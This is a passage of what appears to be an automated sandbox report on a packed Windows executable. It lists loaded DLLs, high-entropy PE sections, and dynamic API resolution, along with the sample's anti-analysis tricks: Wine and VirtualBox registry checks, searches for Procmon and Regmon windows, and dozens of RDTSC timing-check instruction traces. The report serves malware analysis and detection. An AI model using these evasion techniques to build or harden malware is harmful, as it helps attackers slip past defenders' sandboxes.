              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dll
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dll
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: file.exeStatic file information: File size 1840128 > 1048576
              Source: file.exeStatic PE information: Raw size of agjwaxpt is bigger than: 0x100000 < 0x1a7600

              Data Obfuscation

              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;agjwaxpt:EW;qyczlbbe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;agjwaxpt:EW;qyczlbbe:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D86390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D86390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1cfae2 should be: 0x1c4b36
              Source: file.exeStatic PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: agjwaxpt
Source: file.exe | Static PE information: section name: qyczlbbe
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A811C push 24D5C7F9h; mov dword ptr [esp], ebx | 0_2_011A8124
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A811C push 5BB20B2Ch; mov dword ptr [esp], ebp | 0_2_011A81DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0115511D push edx; mov dword ptr [esp], eax | 0_2_01155127
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011C8907 push edi; mov dword ptr [esp], ebx | 0_2_011C8971
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D87895 push ecx; ret | 0_2_00D878A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0114896A push ecx; mov dword ptr [esp], ebx | 0_2_011489AC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011B11B8 push edx; mov dword ptr [esp], eax | 0_2_011B12C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push 4C0B2887h; mov dword ptr [esp], ecx | 0_2_0111C1DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push edx; mov dword ptr [esp], edi | 0_2_0111C1EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push 59790D35h; mov dword ptr [esp], esi | 0_2_0111C2C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push ecx; mov dword ptr [esp], 01A45607h | 0_2_0111C2ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push 0C536226h; mov dword ptr [esp], edx | 0_2_0111C33D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push esi; mov dword ptr [esp], ecx | 0_2_0111C3BF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push 18BA945Bh; mov dword ptr [esp], edi | 0_2_0111C3D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push esi; mov dword ptr [esp], ebp | 0_2_0111C3DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push 67468500h; mov dword ptr [esp], ebp | 0_2_0111C405
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push 465709B6h; mov dword ptr [esp], ecx | 0_2_0111C418
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push ecx; mov dword ptr [esp], eax | 0_2_0111C51C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push esi; mov dword ptr [esp], eax | 0_2_0111C53C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push esi; mov dword ptr [esp], edx | 0_2_0111C540
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push eax; mov dword ptr [esp], 3C4A3027h | 0_2_0111C566
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push ecx; mov dword ptr [esp], eax | 0_2_0111C5B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push ebx; mov dword ptr [esp], eax | 0_2_0111C659
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push eax; mov dword ptr [esp], esi | 0_2_0111C6B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push 1F9DAFD4h; mov dword ptr [esp], eax | 0_2_0111C6B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push eax; mov dword ptr [esp], ecx | 0_2_0111C725
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push eax; mov dword ptr [esp], 0CBBE800h | 0_2_0111C77B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push edx; mov dword ptr [esp], esi | 0_2_0111C7D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push edi; mov dword ptr [esp], 3C103176h | 0_2_0111C800
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push 0B218B78h; mov dword ptr [esp], edx | 0_2_0111C82C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0111C1BE push 04F5874Bh; mov dword ptr [esp], ecx | 0_2_0111C972
Source: file.exe | Static PE information: section name: agjwaxpt entropy: 7.953344227799623

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D86390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00D86390

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-25674
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FAFB03 second address: FAFB07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1131C66 second address: 1131C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1131F39 second address: 1131F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1134C57 second address: 1134CDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a xor dword ptr [esp], 7DD42484h 0x00000011 mov si, 47EFh 0x00000015 push 00000003h 0x00000017 mov di, FCE7h 0x0000001b push 00000000h 0x0000001d mov dword ptr [ebp+122D1C66h], ebx 0x00000023 push 00000003h 0x00000025 push B24FA1E6h 0x0000002a jmp 00007FB8DCDE9E43h 0x0000002f add dword ptr [esp], 0DB05E1Ah 0x00000036 jmp 00007FB8DCDE9E3Bh 0x0000003b sub dword ptr [ebp+122D3468h], edi 0x00000041 lea ebx, dword ptr [ebp+12458AA9h] 0x00000047 mov ecx, edi 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FB8DCDE9E42h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1134CDD second address: 1134CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1134D8F second address: 1134E62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dx, B020h 0x0000000e mov edi, 415EF4B7h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FB8DCDE9E38h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f sub dword ptr [ebp+122D366Ch], ebx 0x00000035 push 9431FF4Dh 0x0000003a pushad 0x0000003b jc 00007FB8DCDE9E3Ch 0x00000041 jmp 00007FB8DCDE9E45h 0x00000046 popad 0x00000047 add dword ptr [esp], 6BCE0133h 0x0000004e push 00000003h 0x00000050 mov edi, dword ptr [ebp+122D3675h] 0x00000056 push 00000000h 0x00000058 push 00000003h 0x0000005a call 00007FB8DCDE9E39h 0x0000005f jno 00007FB8DCDE9E5Eh 0x00000065 push eax 0x00000066 jnl 00007FB8DCDE9E3Eh 0x0000006c mov eax, dword ptr [esp+04h] 0x00000070 pushad 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1134E62 second address: 1134EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB8DCE20296h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 jl 00007FB8DCE2029Eh 0x0000001a push eax 0x0000001b jne 00007FB8DCE20296h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 jnc 00007FB8DCE202AFh 0x0000002c pushad 0x0000002d jmp 00007FB8DCE202A1h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1134FD2 second address: 1134FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1134FD6 second address: 1135085 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE2029Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 65F139FFh 0x00000011 sub dword ptr [ebp+122D182Dh], edi 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b mov dl, E8h 0x0000001d or dword ptr [ebp+122D1BD6h], edx 0x00000023 push 00000003h 0x00000025 pushad 0x00000026 push eax 0x00000027 mov edx, 0EE7A0C6h 0x0000002c pop edi 0x0000002d mov ebx, 2F1F4E00h 0x00000032 popad 0x00000033 call 00007FB8DCE20299h 0x00000038 pushad 0x00000039 push eax 0x0000003a ja 00007FB8DCE20296h 0x00000040 pop eax 0x00000041 jmp 00007FB8DCE2029Ah 0x00000046 popad 0x00000047 push eax 0x00000048 push esi 0x00000049 pushad 0x0000004a jmp 00007FB8DCE202A8h 0x0000004f jng 00007FB8DCE20296h 0x00000055 popad 0x00000056 pop esi 0x00000057 mov eax, dword ptr [esp+04h] 0x0000005b jmp 00007FB8DCE202A8h 0x00000060 mov eax, dword ptr [eax] 0x00000062 push esi 0x00000063 je 00007FB8DCE2029Ch 0x00000069 jg 00007FB8DCE20296h 0x0000006f pop esi 0x00000070 mov dword ptr [esp+04h], eax 0x00000074 pushad 0x00000075 push edi 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1135085 second address: 11350C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FB8DCDE9E40h 0x0000000a popad 0x0000000b pop eax 0x0000000c mov ecx, 77B514CFh 0x00000011 mov edx, ebx 0x00000013 lea ebx, dword ptr [ebp+12458ABDh] 0x00000019 mov ecx, dword ptr [ebp+122D36A5h] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push edi 0x00000024 pop edi 0x00000025 jmp 00007FB8DCDE9E3Ah 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11350C0 second address: 11350C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115521A second address: 1155220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1155220 second address: 1155226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1155226 second address: 1155235 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8DCDE9E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112C964 second address: 112C968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112C968 second address: 112C99D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8DCDE9E3Eh 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB8DCDE9E43h 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007FB8DCDE9E36h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112C99D second address: 112C9A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112C9A6 second address: 112C9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112C9AC second address: 112C9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115309E second address: 11530C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnc 00007FB8DCDE9E36h 0x0000000b jnl 00007FB8DCDE9E36h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FB8DCDE9E3Dh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1153351 second address: 1153390 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8DCE20296h 0x00000008 jp 00007FB8DCE20296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FB8DCE2029Dh 0x00000015 js 00007FB8DCE20298h 0x0000001b pushad 0x0000001c popad 0x0000001d ja 00007FB8DCE20298h 0x00000023 popad 0x00000024 jp 00007FB8DCE202B3h 0x0000002a pushad 0x0000002b push edi 0x0000002c pop edi 0x0000002d push esi 0x0000002e pop esi 0x0000002f push esi 0x00000030 pop esi 0x00000031 popad 0x00000032 push edi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11534C8 second address: 11534D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FB8DCDE9E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11537F3 second address: 11537F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11537F7 second address: 1153819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCDE9E42h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FB8DCDE9E3Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115398A second address: 1153998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCE2029Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111F214 second address: 111F218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111F218 second address: 111F23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007FB8DCE2029Eh 0x00000013 popad 0x00000014 jng 00007FB8DCE202B4h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111F23F second address: 111F245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111F245 second address: 111F249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1154AD6 second address: 1154ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1154ADA second address: 1154AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCE202A9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1127883 second address: 1127889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1127889 second address: 11278A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FB8DCE202A3h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11278A7 second address: 11278F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E3Fh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB8DCDE9E3Ch 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FB8DCDE9E3Dh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB8DCDE9E44h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11278F3 second address: 11278F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11278F9 second address: 11278FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115DCD4 second address: 115DCDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11608CC second address: 11608EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB8DCDE9E3Bh 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FB8DCDE9E3Ch 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1160A56 second address: 1160A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCE2029Bh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1160E64 second address: 1160E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1160E6D second address: 1160E75 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1161023 second address: 116102D instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8DCDE9E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 116102D second address: 1161061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007FB8DCE20296h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FB8DCE202A6h 0x00000016 popad 0x00000017 jmp 00007FB8DCE2029Ch 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1164527 second address: 116452C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 116452C second address: 1164554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007FB8DCE202A2h 0x0000000e jg 00007FB8DCE2029Ch 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jnp 00007FB8DCE2029Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1164554 second address: 1164558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11651DD second address: 11651EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11651EA second address: 11651F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1165819 second address: 1165837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB8DCE2029Ah 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e xchg eax, ebx 0x0000000f jbe 00007FB8DCE202A4h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11663D8 second address: 11663DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11674CC second address: 11674D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11674D9 second address: 11674DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1168A1F second address: 1168A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 call 00007FB8DCE202A6h 0x0000000d stc 0x0000000e pop esi 0x0000000f push 00000000h 0x00000011 adc di, 07CCh 0x00000016 movsx esi, dx 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1168A50 second address: 1168A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1168A54 second address: 1168A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1168A58 second address: 1168A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1169480 second address: 1169484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 116923F second address: 1169243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
